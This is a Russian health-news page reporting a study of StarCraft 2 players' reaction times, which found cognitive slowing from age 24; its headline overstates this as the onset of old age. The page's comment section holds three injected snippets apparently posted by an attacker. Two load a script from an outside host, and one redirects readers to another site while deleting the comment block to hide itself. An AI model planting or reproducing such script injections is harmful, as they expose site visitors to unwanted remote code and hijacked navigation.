Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Считаете ли вы себя старо...  >>  Считаете ли вы себя старой или нет – не важно. Ученые определили точный возраст, с которого начинается старость
 
Обратная связь
 

Считаете ли вы себя старой или нет – не важно. Ученые определили точный возраст, с которого начинается старость

Размер шрифта
06 ноября 2014 00:00
Юрий Малышев
Здоровье инфо
Александр Чистяков
Здоровье инфо
  • google_analytics: false
  • Нравится

Считаете ли вы себя старой или нет – не важно. Ученые определили точный возраст, с которого начинается старость

Сложно смириться с этим фактом, однако, как оказалось, уже к 24 годам вы достигаете максимального уровня развития функций своего мозга. Об этом говорят результаты исследования, недавно опубликованного в журнале PLOS ONE.

Считаете ли вы себя старой или нет – не важно. Ученые определили точный возраст, с которого начинается старость

Это одно из первых социальных исследований, которое основывается на таком большом объеме научных данных. Трое ученых: докторант психологии Джо Томпсон, профессор Марк Блэйр и Эндрю Генри, докторант в области статистики, захотели определить, в каком возрасте начинается снижение наших двигательных и познавательных возможностей и каким образом наш организм это компенсирует. Ученые проанализировали записи результатов 3.305 игроков в Starcraft 2 в возрасте от 16 до 44 лет. Starcraft 2 – это компьютерная игра в жанре «стратегия в реальном времени», в которой есть возможность выигрывать крупные суммы денег.

Записи результатов игроков, которые можно пересматривать, представляют собой очень важный массив данных, ведь они отражают тысячи часов стратегических решений, движений, ходов в реальном времени и на различных уровнях сложности. Используя метод статистического моделирования, ученые смогли выделить из этого колоссального количества данных информацию о том, как игроки отвечали на действия своих соперников и, что более важно, сколько времени занимал процесс реагирования.

«Игроки старше 24-летнего возраста демонстрировали замедление скорости когнитивных процессов головного мозга», – объясняет Томпсон, ведущий автор исследования. «Причем такое снижение производительности наблюдается даже на высоких уровнях сложности. Более взрослые игроки, хотя действуют медленнее, компенсируют это, более эффективно используя возможности самой игры и ее интерфейса, чем это делают молодые люди. Это позволяет им сохранить уровень мастерства, несмотря на снижение скорости когнитивных и двигательных реакций». К примеру, старшие игроки более охотно используют сложные командные клавиши, чтобы компенсировать снижение скорости принятия решений.

По словам Томпсона, результаты говорят о том, что наши когнитивные возможности не сохраняются на одном и том же уровне в течение всей взрослой жизни, а постоянно меняются, а наше ежедневное поведение – результат непрерывного взаимодействия этих изменений и нашей к ним адаптации.

Томпсон также добавляет, что повсеместная компьютеризация позволяет, как и в этом случае, получать огромное количество данных, которые могут стать «золотой жилой» для будущих социальных исследований.

Так что 24 года – вовсе не возраст начала старости, это лишь то время, когда наш мозг начинает работать немного по-другому и адаптироваться к происходящим изменениям.

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 18:30

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

2 - zzzzzz

30 июня 2015 в 21:30

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

3 - zzzzzz

30 июня 2015 в 22:26

Цитировать   |   Пожаловаться

-->> window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Сколько вам лет? Ученые выяснили два самых счастливых возраста   40+: как теперь бороться со стрессом?   Помогите бабушке сохранить свой разум – подарите ей видеоприставку!   Обычная витаминка против старости!  
01 ноября 2013ИНВИТРО – «Марка №1» в России 21 октября 2013ИНВИТРО открыла центр лучевой диагностики «ИНВИТРО.Эксперт»
 
11 октября 2013Елена Малышева расскажет все о том, как правильно худеть 03 октября 2013Результаты благотворительного марафона «Всем миром»
 

Слайдшоу

1
Чего боятся женщины с годами
Странные сигналы вашего организма
Как снова хотеть секса

Тесты

1
Будет ли у вас инфаркт?
Кофеин вызывает зависимость?
Как устроены волосы человека?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.